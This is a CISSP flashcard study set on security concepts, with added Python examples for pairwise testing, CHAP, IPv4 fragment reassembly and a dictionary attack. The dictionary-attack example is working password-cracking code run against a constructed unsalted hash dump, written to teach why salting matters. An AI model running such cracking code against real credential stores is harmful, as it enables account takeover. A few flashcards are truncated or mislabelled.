CISSP Study Set
Ethernet
dominant local area networking technology that transmits network data via frames. Originally a physical bus, now normally a physical star (switched). Speeds have evolved from 10 Mbps through 100 Mbps and 1000 Mbps (Gigabit) to 10 Gbps and beyond.
Add Round Key
The final function applied in each AES round (and once before the first round). XORs the state with the round subkey; the subkeys are derived from the cipher key by the key schedule.
Differential Cryptanalysis
Finds the "difference" between related plaintexts that are encrypted under the same key; the plaintexts may differ by only a few bits. The attacker studies how those differences propagate into the ciphertexts to recover key information.
Origin of Term: Computer
first used in 1613 to describe a person who added numbers
Static Routes
fixed routing entries, saying "The route for network 10.0.0.0/8 goes via router 192.168.2.7." Do not adapt to outages; must be maintained by hand.
The User Acceptance test
focuses mainly on the functionality thereby validating the fitness-for-use of the system by the business user.
Cache Memory
is the fastest memory on the system, required to keep up with the CPU as it fetches and executes instructions. The CPU's register file is faster still.
Host-to-gateway(IPsec)
Client Mode; used to connect one system that runs IPsec client software to an IPsec gateway
Core Impact
Closed Source Penetration Testing Tool
Closed source
Closed source software is software typically released in executable form
SSO Disadvantages
Difficult to retrofit. Unattended desktop. Single point of attack/failure
Elliptic Curve Cryptography
ECC leverages a one-way function that uses discrete logarithms as applied to elliptic curves
HEPA
High efficiency particulate air filters
HDLC
High-Level Data Link Control. Successor to SDLC. HDLC adds error correction and flow control. Modes: NRM (Normal Response), ARM (Asynchronous Response) and ABM (Asynchronous Balanced).
IPID
The IP Identification field carries the same value in every fragment of one datagram, so the receiver can re-associate the fragments. The separate Fragment Offset field says where each piece belongs ("Copy this data beginning at offset 1480.").
Data Owner
Information Owner. A management employee responsible for ensuring that specific data is protected; determines the data's classification and who may access it.
Information Security Governance
Information Security at the organizational level. It is the organizational priority provided by senior leadership.
Interrupt
An interrupt is an asynchronous event that causes the CPU to stop processing its current task and service the event (for example, I/O completion).
Token Ring (Deterministic)
Legacy. Possession of a token allows a node to transmit on the network; because only the token holder may send, there are no collisions (deterministic access).
VPN
Protected via standards-based end-to-end encryption, e.g., an IPsec VPN. May be used as one measure in defense in depth.
RAID
Redundant Array of Inexpensive Disks has the goal to help mitigate the risk associated with hard disk failure
Semantic integrity
each attribute (column) value is consistent with the attribute data type
ePHI and HIPAA
electronic Protected Health Information (ePHI). The 2009 HITECH Act updated the U.S. Health Insurance Portability and Accountability Act (HIPAA) and added breach-notification requirements; encrypting ePHI is expected, since breaches of unencrypted ePHI must be reported.
Dynamic Signature
measure the process by which someone signs his/her name.
Partial-Knowledge
are in between zero and full knowledge: the penetration tester receives some limited trusted information.
POP3
Post Office Protocol version 3, used for client-server email access (the client downloads mail from the server).
2nd Gen Language
assembly
Assess
assess the extent of the damage to determine the proper steps necessary to ensure the organization's ability to meet its mission and Maximum Tolerable Downtime (MTD).
Backups
assure the availability and integrity of mobile data
Script Kiddies
attack computer systems with tools they have little or no understanding of, e.g., the Metasploit framework.
Inference
attacker must logically deduce missing details: unlike aggregation, a mystery must be solved.
Time of Check/Time of Use Attacks
attacks are also called race conditions: an attacker attempts to alter a condition after it has been checked by the operating system, but before it is used.
Disassembler
attempts to convert machine language into assembly.
Root-cause analysis
attempts to determine the underlying weakness or vulnerability that allowed the incident to be realized.
Organization Registration Authorities(ORAs)
authenticate the identity of a certificate requester before the Certificate Authority issues the certificate; the RA verifies identity but does not sign certificates itself.
Object Oriented Database
combines data with the code that operates on it, within an object-oriented framework/infrastructure.
Pipelining
combines multiple steps into one combined process, so that different instructions occupy different stages at the same time. Pipeline depth is the number of simultaneous stages that may be in progress at once. Like an automobile assembly line.
Hybrid Analysis
combines objective quantitative analysis and subjective qualitative analysis.
Computer Crime: 3 Types
computer systems as targets, computer systems as a tool to perpetrate the crime, or computer systems involved but incidental.
Level 2 Caches
connected to (but outside) the CPU. SRAM is used for cache memory.
Host-to-Host/Transport Layer
connects the Internet Layer to the Application Layer. Aligns with OSI Layer 4 (Transport).
Customary Law
customs or practices that are so commonly accepted by a group that the custom is treated as law. The concept of "best practices" is closely associated with customary law.
Slack space
Data is stored in fixed-size chunks known as clusters (clusters are sometimes also referred to as sectors or blocks). Slack space is the unused portion between the end of a file's data and the end of its last cluster; it may still hold remnants of previously deleted data, which is why forensic tools examine it.
Layer 6 - Presentation
presents data to the application (and user) in a comprehensible way
Account lockouts
prevent an attacker from being able to simply guess the correct password by attempting a large number of potential passwords
Interface Testing
primarily concerned with appropriate functionality being exposed across all the ways users can interact with the application.
Symmetric ciphers
primarily used for confidentiality
Rootkits
Replaces portions of the kernel and/or operating system. Kernel-mode rootkits run in ring 0; user-mode rootkits run in ring 3 and commonly replace binaries such as ls or ps on Linux/UNIX so that the attacker's files and processes are hidden.
Object-Oriented Programming (OOP)
replicates the use of objects in computer programs.
NIDS
require promiscuous network access in order to analyze all traffic
Health Insurance Portability and Accountability Act (HIPAA)
requires that medical providers keep the personal and medical information of their patients private.
Pool NAT
reserves a number of public IP addresses in a pool
Scoping
the process of determining which portions of a standard will be employed by an organization. E.g., wireless provisions would be out of scope for an organization with no wireless network.
Software Escrow
the process of having a third party store an archive of computer software. Often negotiated as part of a contract with a proprietary software vendor
Facial Scan
the process of passively taking a picture of a subject's face and comparing that picture to a list stored in a database
Client-Side Attacks
The user downloads malicious content. Difficult to defend against for organizations that allow Internet access. Clients include word processing software, spreadsheets, media players and web browsers (Flash, Acrobat, iTunes, QuickTime).
Multicast
uses "Class D" addresses when used over IPv4. Eg: streaming audio or video
Traceroute
uses ICMP Time Exceeded messages, returned by each router as the probe's TTL expires, to trace a network route. UNIX traceroute sends UDP probes by default; Windows tracert sends ICMP Echo Requests.
War dialing
uses a modem to dial a series of phone numbers. Looks for answering modem carrier.
Dictionary Attack
uses a word list: a predefined list of words, and each word in the list is hashed. If the cracking software matches the hash output from the dictionary attack to the password hash, the attacker has successfully identified the original password.
Hacker
A malicious individual who attacks computer systems.
AES
Advanced Encryption Standard. Current US standard symmetric block cipher (128-bit block). Key sizes: 128 bit (10 rounds), 192 bit (12 rounds), 256 bit (14 rounds). FIPS approved standard until 2030.
Internet Layer
Aligns with Layer 3 (Network) layer of the OSI model
CMP
Crisis Management Plan designed to provide effective coordination among the managers of the organization in the event of an emergency or disruptive event.
Socket Pairs
Describes a unique connection between two nodes: source IP, source port, destination IP and destination port. "Established" during a connection.
Information Flow Model
Describes how information may flow in a secure system.
Biometric Enrollment
Describes the process of registering with a biometric system. Creating an account for the first time
Compliance(Policy)
Describes two related issues: How to judge the effectiveness of the policies(how well they work), and what happens when the policy is violated.
SDLC 5
Design
Compliance acceptance testing
Also known as regulation acceptance testing; performed against the regulations which must be adhered to, such as governmental, legal or safety regulations.
PPP
Layer 2 protocol that has largely replaced SLIP. PPP is based on HDLC (discussed previously), and adds confidentiality, integrity, and authentication over point-to-point links. Supports both asynchronous (modem) and synchronous (e.g., T1) links.
SLIP
Layer 2 protocol that provides IP connectivity via asynchronous connections such as serial lines and modems
Switch
Layer 2, based on MAC
Router
Layer 3 devices that route traffic from one LAN to another LAN. IP-based routers make routing decisions based on the source and destination IP addresses.
Routers
Layer 3 devices that route traffic from one LAN to another
Router
Layer 3, based on IP
Packet Filter and Stateful Firewalls
Layers 3 and 4. IP Addresses and Ports.
FDDI
Legacy. Fiber Distributed Data Interface. A logical network ring via a primary and secondary counter-rotating fiber optic ring
Unit Testing
Low-level tests of software components, such as functions, procedures or objects
Virtualization Benefits
Lower hardware cost, less cooling needs, snapshots allow reversion to past states.
Water(Fire)
Lowers temperature
1st Gen Language
Machine Code
802.1X
Port Based Network Access Control. Includes EAP
Detective Controls
They alert during or after a successful attack. Intrusion detection systems(IDS) and CCTV are examples of detective controls.
Archive Bits
A file attribute used to determine whether a file has been modified since it was last backed up: the OS sets the bit when a file changes. Full and incremental backups clear the bit (1 to 0) after copying; differential backups do not, so each differential captures everything changed since the last full backup.
Static testing
includes walkthroughs, syntax checking, and code reviews
Screened Host Architecture
is an older flat network design using one screening router to filter external traffic to and from a bastion host.
DCOM
Distributed Component Object Model (Microsoft): locates and invokes objects over a network.
Business Continuity Plan
long-term plan to ensure the continuity of business operations
Volatile Memory
loses integrity after power loss.
Remote Journaling
may be used to recover from a database failure.
Evacuation Routes
meeting points are critical.
Return on Investment
money saved by deploying a safeguard
Preponderance
more likely than not.
Hashing
one way cryptographic transformation
Unicast
one-to-one traffic, such as a client surfing the Web
Hash Function
One-way cryptographic transformation that uses an algorithm and no key, producing a fixed-length digest. Not encryption: there is no decryption.
Cripple ware
partially functioning proprietary software, often with key features disabled.
Magnetic Stripe Card
passive device that contains no circuits. Read when swiped through a card reader.
Cohesive Object
performs most of its functions independently. Cohesion is inversely related to coupling.
EU-US Safe Harbor
Under EU data protection rules, personal data of EU citizens may not be transmitted, even when permitted by the individual, to countries outside the EU unless the receiving country is perceived by the EU to adequately protect data. Safe Harbor was the framework under which US companies self-certified adequate protection (invalidated by the EU Court of Justice in 2015).
Security Safeguards Principle
personal data should be reasonably protected against unauthorized use.
Use Limitation Principle
personal data should never be disclosed without either the consent of the individual or as the result of a legal requirement
Smart Card
physical access control device that is often used for electronic locks and credit card purchases. Can be contact or contactless.
Procedural languages
programming languages that use subroutines, procedures and functions.
Top-Down (TD)
programming starts with the broadest and highest level requirements (the concept of the final program)
Surge
prolonged high voltage (a spike is momentary)
Blackout
prolonged loss of power
Corrective Controls
work by "correcting" a damaged system or process. The corrective access control typically works hand-in-hand with detective. Antivirus software is an example.
Pattern Matching IDS
works by comparing events to static signatures
Coupled Object
requires many other objects to perform basic jobs. Coupling is inversely related to cohesion.
Broadcast
sent to all stations on a LAN
Shadow Database
serves as a live backup for a database. Not regularly accessed by the client.
Circumstantial Evidence
serves to establish the circumstances related to particular points or even other evidence.
Fault
short loss of power (a blackout is prolonged)
Fences
simple deterrent
Unlicensed Band
small amount of contiguous radio spectrum set aside for unlicensed use, e.g., the 2.4 GHz ISM band used by 802.11 and Bluetooth.
Applets
small pieces of mobile code that are embedded in other software such as Web browsers. Executables written in a variety of languages.
Register
small storage locations used by the CPU to store instructions and data.
Cryptographic requirements
speed, strength, cost, complexity must be weighed against each other.
Weak Tranquility Property
states that security labels will not change in a way that conflicts with defined security properties
Strong Tranquility Property
states that security labels will not change while the system is operating.
Dynamic Random Access Memory (DRAM)
stores bits in small capacitors (like small batteries), and is slower and cheaper than SRAM. DRAM Capacitors leak charge. they must be continually refreshed to maintain integrity.
Multilevel
stores objects of differing sensitivity labels and allows system access by subjects with differing clearances. A reference monitor mediates access between subjects and objects.
Compilers
take source code written in a higher-level language such as C or BASIC and compile it into machine code.
Soda Acid
suppresses fire by removing the oxygen that sustains it.
Mirroring
used to achieve full data redundancy by writing the same data to multiple hard disks
SMTP
used to transfer email between servers
Processes and Threads
A process is an executable program loaded into memory. A heavy-weight process (HWP) is also called a task. A parent process may spawn child processes. A thread is a lightweight process (LWP) that runs inside a process; threads share the process's memory, so they are cheaper to create and switch between than separate processes.
Procurement
Process of acquiring products or services from a 3rd party.
ISO 17799
Renumbered to ISO 27002 in 2005. ISO 27001 is a related standard, formally called ISO/IEC 27001:2005 Information Security Management Systems - Requirements. Based on BS 7799 Part 2.
Hub
Repeater with two or more ports. No Security, no Isolation. Half Duplex. One "Collision" Domain. Unsuitable for Modern purposes
ROC
Report of Compliance
RFC
Request for Comments, a way to discuss and publish standards on the Internet
Security Policies and Procedures
Required parts of any successful information security program.
SDLC 4
Requirements Analysis
Technical Countermeasures
Routers, switches, firewalls.
User Access Permissions Table
Rows show capabilities of each subjects(capability list). Columns show the ACL for each object or application
Paravirtualization
Runs Modified OS
Multiprocessing
Runs multiple processes on multiple CPUs. Two types: Symmetric Multiprocessing (SMP), where all CPUs share one operating system and memory, and Asymmetric Multiprocessing (AMP), where CPUs are dedicated to specific tasks.
iSCSI
SAN protocol that allows for leveraging existing networking infrastructure and protocols to interface with storage
ECB
Electronic Codebook. Simplest and weakest block cipher mode (of DES, AES, etc.). Uses no initialization vector (IV) and no chaining, so identical plaintext blocks encrypted under the same key produce identical ciphertext blocks and patterns in the plaintext leak into the ciphertext. **BLOCK**
Annualized Loss Expectancy(ALE)
SLE X ARO; Cost of losses per Year
The TCP handshake
SYN, SYN-ACK, ACK. The client chooses an initial sequence number (ISN), set in the first SYN segment; the server chooses its own ISN in the SYN-ACK. Once a connection is established, ACKs typically follow for each segment.
Preamble
Safety of the commonwealth, duty to our principals, and to each other, requires that we adhere to the highest ethical standards of behavior.
RAID 4
Same as RAID 3, but stripes data at the block level (still with a dedicated parity disk).
Side-Channel Attack
Side-channel attacks use physical data to break a cryptosystem, such as monitoring CPU cycles or power consumption used while encrypting or decrypting
Cipher Feedback
Similar to CBC. CFB is a stream mode cipher, uses an IV(Random Number/NONCE), errors propagate. **STREAM**
SMTP
Simple Mail Transfer Protocol, a store-and-forward protocol used to exchange email between servers
SNMP
Simple Network Management Protocol, primarily used to monitor network devices. HP OpenView and MRTG use SNMP
Vernam Cipher
Simple XOR cipher; Gilbert Vernam implemented it on teletype machines, XORing the message with a key tape. With a truly random key as long as the message and never reused it becomes the one-time pad.
Thin Clients
Simpler than normal computer systems, which have hard drives, full operating systems, locally installed applications, etc. Thin clients rely on servers for applications and storage of associated data. E.g., diskless workstations; a web browser used as a universal client.
Asymmetric and Symmetric Tradeoffs
Asymmetric ciphers are slower than symmetric, and weaker per bit of key length, but they solve key distribution and enable digital signatures. In practice the two are combined: asymmetric crypto exchanges a symmetric session key that encrypts the bulk data.
SCSI
Small Computer System Interface Disk Drive
Band
Small amount of contiguous radio spectrum. Wireless LAN technology uses the 2.4 and 5 GHz bands.
FCoE
Fibre Channel over Ethernet: a Storage Area Network (SAN) protocol that carries Fibre Channel, which has long been used for storage networking, over Ethernet.
Data at Rest
Stored Data. Residing on a Disk or In a File.
Firmware
Stores small programs that do not change frequently, such as a computer's BIOS. Router OS.
Stream Cipher
Stream modes(ciphers) means each bit is independently encrypted
RAID 3
Striped Set with Dedicated Parity (Byte Level). Striping is desirable due to the performance gains associated with spreading data across multiple disks. An additional disk is leveraged for storage of parity information, which is used for recovery in the event of a failure.
RAID 5
Striped Set with Distributed Parity. Focus on striping for the performance increase. And parity in case of failure
RAID 6
Striped Set with Dual Distributed Parity
RAID 0
Striped Set: employs striping to increase the performance of read and writes
Bollard
Strong post designed to stop a car, Also to tie ship to pier. Installed in front of building to protect them. Large concrete planters are used to the same effect.
Writing Up
Subject writes up; data flows up.
Qualitative Analysis
Subjective analysis of approximate values
Role-Based Access Controls
Subjects are grouped into roles and each defined role has access permissions based upon the role, not the individual
Polyalphabetic cipher
Substitution cipher that uses multiple alphabets (e.g., Vigenère), defeating simple frequency analysis.
File Permissions
Such as read, write, and execute, control access to files.
BCP/DRPaS
BCP/DRP as a Service providers, e.g., SunGard Availability Services, IBM.
Tailoring Process: 5
Supplementing baselines with additional security controls and control enhancements, if needed; and;
Pairwise Testing
Suppose we want to demonstrate that a new software application works correctly on PCs that use the Windows or Linux operating systems, with several browsers and databases. Rather than test every combination, pairwise testing builds a reduced set of tests in which every pair of parameter values appears at least once, since most defects involve the interaction of only one or two factors.
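The following is an added worked example, not part of the study set: a greedy all-pairs generator for the scenario above. The three parameters (OS, browser, database) and their values are constructed for illustration.

```python
"""Greedy pairwise (all-pairs) test-case generation.

Added example, not part of the study set. The three parameters below are
constructed for illustration; they extend the text's Windows/Linux case.
"""
from itertools import combinations, product

def all_pairs(params: dict) -> set:
    """Every (param, value) x (param, value) pair that a pairwise suite must cover."""
    pairs = set()
    for (name_a, vals_a), (name_b, vals_b) in combinations(params.items(), 2):
        for a in vals_a:
            for b in vals_b:
                pairs.add(((name_a, a), (name_b, b)))
    return pairs

def pairs_in(test: dict, order: list) -> set:
    """The pairs one test case covers, in the same parameter order as all_pairs."""
    return {((a, test[a]), (b, test[b])) for a, b in combinations(order, 2)}

def generate_pairwise(params: dict) -> list:
    """Greedy construction: repeatedly pick the full combination that covers the
    most still-uncovered pairs until every pair appears in at least one test.
    Candidates are the whole Cartesian product, so this only suits small
    parameter sets; production tools use smarter constructions."""
    order = list(params)
    uncovered = all_pairs(params)
    candidates = [dict(zip(order, values)) for values in product(*params.values())]
    tests = []
    while uncovered:
        best = max(candidates, key=lambda t: len(pairs_in(t, order) & uncovered))
        gained = pairs_in(best, order) & uncovered
        if not gained:          # defensive; cannot happen while uncovered is non-empty
            break
        tests.append(best)
        uncovered -= gained
    return tests

def covers_all_pairs(tests: list, params: dict) -> bool:
    order = list(params)
    covered = set().union(*(pairs_in(t, order) for t in tests))
    return all_pairs(params) <= covered

PARAMS = {                                   # constructed sample parameters
    "os": ["Windows", "Linux"],
    "browser": ["Chrome", "Firefox", "Edge"],
    "database": ["PostgreSQL", "MySQL"],
}

def demo() -> dict:
    tests = generate_pairwise(PARAMS)
    return {"pairwise_tests": len(tests),
            "exhaustive_tests": len(list(product(*PARAMS.values()))),
            "all_pairs_covered": covers_all_pairs(tests, PARAMS)}

if __name__ == "__main__":
    for t in generate_pairwise(PARAMS):
        print(t)
    print(demo())
```

For this input the exhaustive suite has 12 combinations while the pairwise suite needs at most a handful (the lower bound is 6, one per OS/browser pair), and every pair of values still appears at least once.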
Thrashing
Excessive paging that occurs when active processes need more memory than RAM can hold, so the system spends its time swapping pages in and out rather than doing useful work. Impacts availability.
SPAN ports
A Switched Port Analyzer (SPAN) port is one way to see unicast traffic sent to and from other devices on the same switch. Called SPAN by Cisco, mirror port by HP. Can overload the monitoring link (e.g., mirroring 23 ports of a 24-port 100 Mbit switch onto one 100 Mbit port).
Kerberos Characteristics
Symmetric encryption. Provides mutual authentication of both clients and servers. Protects against network sniffing and replay attacks.
14:SYN
Synchronize a connection
Integration Testing
Testing multiple software components as they are combined into a working system. Subsets may be tested, or Big Bang integration testing tests all integrated software components
Regression Testing
Testing software after updates, modifications, or patches
Installation Testing
Testing software as it is installed and first operated
User Acceptance Testing
Testing that is done directly by the customer.
Static Testing
Tests code passively: the code is not running.
Dynamic Testing
Tests code while executing it
***Canons Note***
The canons are applied in order, and when faced with an ethical dilemma, you must follow the canons in order, i.e.
Difference between Reading Up & Writing Down
The direction that information is being passed
Security Target (ST)
The documentation describing the ToE, including the security requirements and operational environment
Full Backup
The easiest to understand of the types of backup; it is simply a replica of all allocated data on a hard disk. Slowest to perform.
Target of Evaluation(ToE)
The system or product that is being evaluated
Modem
"Modulator/Demodulator" takes binary data and modulates it into anolog sound that can be carried on phone networks designed to carry voice.
Bell-LaPadula Security Model
"No Read Up" (NRU). Also known as the the Simple Security Property. Focused on protecting confidentiality.
Simple Integrity Axiom
"No read down:" A subject at a specific classification level cannot read data at a lower classification. Prevents movement of bad information
Simple Security Property
"No read up:" a subject at a specific classification level cannot read an object at a higher classification level. 'Secret' Clearance holders not able to access 'Top Secret'
* Security Property(Star Security Property)
"No write down." A subject at a higher classification level cannot write to a lower classification level.
* Integrity Axiom
"No write up:" A subject at specific classification level cannot write to data at a higher classification.
PROM
(Programmable Read Only Memory) can be written to once, typically at the factory.
Reserved Ports
0-1023
Class A
0.0.0.0 - 127.255.255.255 16,777,216 addresses
Project Initiation
NIST SP 800-34 contingency planning steps: 1. Develop the contingency planning policy statement 2. Conduct the business impact analysis (BIA) 3. Identify preventive controls 4. Develop recovery strategies 5. Develop an IT contingency plan 6. Plan testing, training, and exercises 7. Plan maintenance
BIA Processes
1. Identification of Critical Assets 2. Comprehensive Risk Assessment
CHAP Process
1. The server sends a random challenge. 2. The user hashes the challenge string together with the password (e.g., with MD5) and sends the hash as the response. 3. The CHAP server computes the same hash from its copy of the password and the challenge, creating the expected response, and compares it with what was received. The password never crosses the wire, and a fresh challenge each time defeats replay.
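The three steps above, as an added example that is not part of the study set. It follows the RFC 1994 response construction MD5(Identifier || secret || challenge); the user name, shared secret and challenge bytes are constructed for illustration.

```python
"""CHAP exchange (RFC 1994) between a peer and an authenticator.

Added example, not part of the study set. The shared secret is constructed
for illustration; the challenge is random, as it must be.
"""
import hashlib
import hmac
import os

def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """MD5(Identifier || secret || challenge). Only this hash crosses the wire."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

class Authenticator:
    """The server side: issues challenges and checks responses."""
    def __init__(self, secrets: dict):
        self.secrets = secrets            # user name -> shared secret
        self.outstanding = {}             # identifier -> challenge still awaiting a response
        self.next_id = 0

    def challenge(self) -> tuple:
        """Step 1: send a fresh, unpredictable challenge tagged with an identifier."""
        ident = self.next_id % 256
        self.next_id += 1
        chal = os.urandom(16)
        self.outstanding[ident] = chal
        return ident, chal

    def verify(self, ident: int, name: str, response: bytes) -> bool:
        """Step 3: recompute the expected hash and compare in constant time.
        A challenge is consumed on first use, so an old response cannot be replayed."""
        chal = self.outstanding.pop(ident, None)
        secret = self.secrets.get(name)
        if chal is None or secret is None:
            return False
        expected = chap_response(ident, secret, chal)
        return hmac.compare_digest(expected, response)

class Peer:
    """The client side: hashes the challenge with its password."""
    def __init__(self, name: str, secret: bytes):
        self.name, self.secret = name, secret

    def respond(self, ident: int, chal: bytes) -> bytes:
        """Step 2."""
        return chap_response(ident, self.secret, chal)

def demo() -> dict:
    secret = b"correct horse battery staple"       # constructed shared secret
    auth = Authenticator({"alice": secret})
    peer = Peer("alice", secret)

    ident, chal = auth.challenge()
    resp = peer.respond(ident, chal)
    valid = auth.verify(ident, "alice", resp)

    # An attacker who sniffed `resp` replays it against the next challenge.
    ident2, _ = auth.challenge()
    replay = auth.verify(ident2, "alice", resp)

    # A peer with the wrong password produces a different hash.
    ident3, chal3 = auth.challenge()
    wrong = auth.verify(ident3, "alice", Peer("alice", b"guess").respond(ident3, chal3))
    return {"valid": valid, "replay": replay, "wrong_secret": wrong}

if __name__ == "__main__":
    print(demo())
```

Note the exposure CHAP does not remove: the server must store the password in a form it can feed into the hash, and anyone who captures a challenge/response pair can run an offline dictionary attack against it.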
AES Four Functions
1. SubBytes 2. ShiftRows 3. MixColumns 4. AddRoundKey Functions provide confusion,diffusion, and XOR encryption.
COBIT; 4 domains
1. Plan and Organize 2. Acquire and Implement 3. Deliver and Support 4. Monitor and Evaluate
TGT Lifetime
10 Hours
Ephemeral Ports
1024-65535
IPv6 header
Fixed 40-byte header; addresses are 128 bits, written as hex groups separated by colons. Fields: Version, Traffic Class, Flow Label, Payload Length, Next Header, Hop Limit, Source and Destination addresses. Examples: fc01::20c:29ff:feef:1136/64 (scope: global), fe80::20c:29ff:feef:1136/64 (scope: link).
Class B
128.0.0.0 - 191.255.255.255; 65,536 addresses per network
Bluetooth(802.15)
2.4 GHz, like 802.11. Transmits data over short distances. Class 3: under 10 meters; Class 2: 10 meters; Class 1: 100 meters. Automatic discovery should be off.
IPv4 Header Fields
20 bytes minimum: Version; IHL (length of the IP header); Type of Service; Identification, Flags, Fragment Offset; Time To Live; Protocol; Header Checksum; Source and Destination IP addresses; Options (optional).
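The header layout above and the IPID/fragment-offset relationship described earlier, as an added example that is not part of the study set. The parser below reads the fixed 20-byte header with struct, and the reassembler groups fragments by (source, destination, ID, protocol) and stitches them by offset. The packets are constructed by hand, not captured.

```python
"""Parse the fixed 20-byte IPv4 header and interpret the fragmentation fields.

Added example, not part of the study set. The fragments below are constructed
by hand for illustration, not captured from a real network.
"""
import struct

IPV4_HEADER = struct.Struct("!BBHHHBBH4s4s")   # 20 bytes, network byte order

def parse_ipv4_header(raw: bytes) -> dict:
    """Return the fields of an IPv4 header as a dict."""
    if len(raw) < IPV4_HEADER.size:
        raise ValueError("need at least 20 bytes for an IPv4 header")
    (ver_ihl, tos, total_len, ident, flags_frag, ttl, proto,
     checksum, src, dst) = IPV4_HEADER.unpack_from(raw)
    version = ver_ihl >> 4
    ihl = (ver_ihl & 0x0F) * 4                   # header length in bytes
    if version != 4 or ihl < 20:
        raise ValueError("not a well-formed IPv4 header")
    flags = flags_frag >> 13
    return {
        "version": version,
        "ihl": ihl,
        "total_length": total_len,
        "id": ident,                             # same value in every fragment of one datagram
        "df": bool(flags & 0b010),               # Don't Fragment
        "mf": bool(flags & 0b001),               # More Fragments follow
        "frag_offset": (flags_frag & 0x1FFF) * 8,  # on the wire in 8-byte units
        "ttl": ttl,
        "protocol": proto,
        "src": ".".join(map(str, src)),
        "dst": ".".join(map(str, dst)),
    }

def build_ipv4_header(ident, mf, frag_offset_bytes, payload_len, src, dst, proto=17, ttl=64):
    """Minimal header (checksum left 0) so fragments can be constructed inline."""
    flags_frag = ((0b001 if mf else 0) << 13) | (frag_offset_bytes // 8)
    return IPV4_HEADER.pack(0x45, 0, 20 + payload_len, ident, flags_frag, ttl, proto, 0,
                            bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))

def reassemble(fragments) -> dict:
    """Group fragments by (src, dst, id, protocol) and stitch payloads by offset.
    Gaps and overlaps are rejected: hosts disagree on how to resolve overlapping
    fragments, which is what fragment-based IDS evasion exploits."""
    groups = {}
    for raw in fragments:
        h = parse_ipv4_header(raw)
        key = (h["src"], h["dst"], h["id"], h["protocol"])
        groups.setdefault(key, []).append((h, raw[h["ihl"]:h["total_length"]]))
    datagrams = {}
    for key, pieces in groups.items():
        pieces.sort(key=lambda p: p[0]["frag_offset"])
        expected, out, saw_last = 0, bytearray(), False
        for h, payload in pieces:
            if h["frag_offset"] != expected:
                raise ValueError(f"gap or overlap at offset {h['frag_offset']} for id {key[2]:#x}")
            out += payload
            expected += len(payload)
            saw_last = not h["mf"]
        if not saw_last:
            raise ValueError(f"final fragment missing for id {key[2]:#x}")
        datagrams[key] = bytes(out)
    return datagrams

# Constructed sample: a 2000-byte UDP payload split to fit a 1500-byte MTU.
PAYLOAD = bytes(range(256)) * 7 + bytes(208)                      # 2000 bytes
FRAG1 = build_ipv4_header(0x1234, True, 0, 1480, "10.0.0.5", "10.0.0.9") + PAYLOAD[:1480]
FRAG2 = build_ipv4_header(0x1234, False, 1480, 520, "10.0.0.5", "10.0.0.9") + PAYLOAD[1480:]

if __name__ == "__main__":
    for frag in (FRAG1, FRAG2):
        h = parse_ipv4_header(frag)
        print(f"id={h['id']:#06x} mf={h['mf']} offset={h['frag_offset']} len={h['total_length']}")
    key = ("10.0.0.5", "10.0.0.9", 0x1234, 17)
    print(len(reassemble([FRAG2, FRAG1])[key]), "bytes reassembled")
```

The second fragment carries the same ID as the first and an offset of 1480, which is exactly the "copy this data beginning at offset 1480" instruction from the IPID card.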
802.11 Security
802.11 wireless security standards (including WEP and 802.11i/WPA2).
Types of Wireless
802.11 (original): 2 Mbps / 2.4 GHz; 802.11a: 54 Mbps / 5 GHz; 802.11b: 11 Mbps / 2.4 GHz; 802.11g: 54 Mbps / 2.4 GHz; 802.11n: 72-600 Mbps / 2.4 and 5 GHz.
Supplicant
802.1X client
Object
A "black box" that combines code and data, and sends and receives messages
Rainbow Tables
A rainbow table is a pre-computed compilation of plaintexts and matching ciphertexts (typically passwords and their matching hashes), indexed so that a captured hash can be looked up to recover the password. Defeated by salting, which makes the precomputed table useless.
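An added example, not part of the study set, that covers both the Dictionary Attack card and this one: the same word list is hashed once into a lookup table and applied to an unsalted credential dump, then the same attack is run against a salted, iterated (PBKDF2) store, where no table can be shared between users. The word list and both "leaked" stores are constructed inline.

```python
"""Dictionary attack on unsalted hashes, and how per-user salts plus a slow
KDF break the precomputed-table approach.

Added example, not part of the study set. The word list and the 'leaked'
credential stores are constructed inline for illustration.
"""
import hashlib
import os

WORDLIST = ["password", "letmein", "dragon", "qwerty", "sunshine", "hunter2"]
ITERATIONS = 2_000   # kept small so the demo runs quickly; use far more in production

def unsalted_hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()

def salted_hash(password: str, salt: bytes, iterations: int) -> str:
    """PBKDF2-HMAC-SHA256: the salt makes precomputation per-user, the
    iteration count makes every guess expensive."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()

def build_lookup(words) -> dict:
    """hash -> word. Built once and reusable against every unsalted dump;
    a rainbow table is the space-optimised version of this idea."""
    return {unsalted_hash(w): w for w in words}

def crack_unsalted(leaked: dict, lookup: dict) -> dict:
    """leaked: user -> sha256 hex. Each user costs one dictionary lookup."""
    return {user: lookup[h] for user, h in leaked.items() if h in lookup}

def crack_salted(leaked: dict, words, iterations: int) -> tuple:
    """leaked: user -> (salt, pbkdf2 hex). No shared table is possible: every
    word must be re-hashed under each user's salt. Returns (found, kdf_calls)."""
    found, calls = {}, 0
    for user, (salt, digest) in leaked.items():
        for w in words:
            calls += 1
            if salted_hash(w, salt, iterations) == digest:
                found[user] = w
                break
    return found, calls

def make_stores() -> tuple:
    """Constructed credential stores; alice and bob reuse the same weak password."""
    plain = {"alice": "sunshine", "bob": "sunshine", "carol": "Tr0ub4dor&3"}
    unsalted = {u: unsalted_hash(p) for u, p in plain.items()}
    salted = {}
    for u, p in plain.items():
        salt = os.urandom(16)
        salted[u] = (salt, salted_hash(p, salt, ITERATIONS))
    return unsalted, salted

def demo() -> dict:
    unsalted, salted = make_stores()
    lookup = build_lookup(WORDLIST)
    found_unsalted = crack_unsalted(unsalted, lookup)
    found_salted, calls = crack_salted(salted, WORDLIST, ITERATIONS)
    return {
        "unsalted_cracked": found_unsalted,
        "unsalted_same_hash": unsalted["alice"] == unsalted["bob"],
        "salted_cracked": found_salted,
        "salted_same_hash": salted["alice"][1] == salted["bob"][1],
        "salted_kdf_calls": calls,
    }

if __name__ == "__main__":
    print(demo())
```

Both dictionary-word passwords still fall when salted, because a salt does not make a weak password strong; what changes is the cost model. Unsalted, the two identical passwords share one hash and one table lookup. Salted, the hashes differ and the attacker pays one KDF call per word per user (16 here), with no precomputation to amortise.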
Penetration Tester
A White Hat Hacker who receives authorization to attempt to break into an organization's physical or electronic perimeter.
Backup
A backup is the most basic and obvious measure to increase system or data fault tolerance by providing for recoverability in the event of a failure.
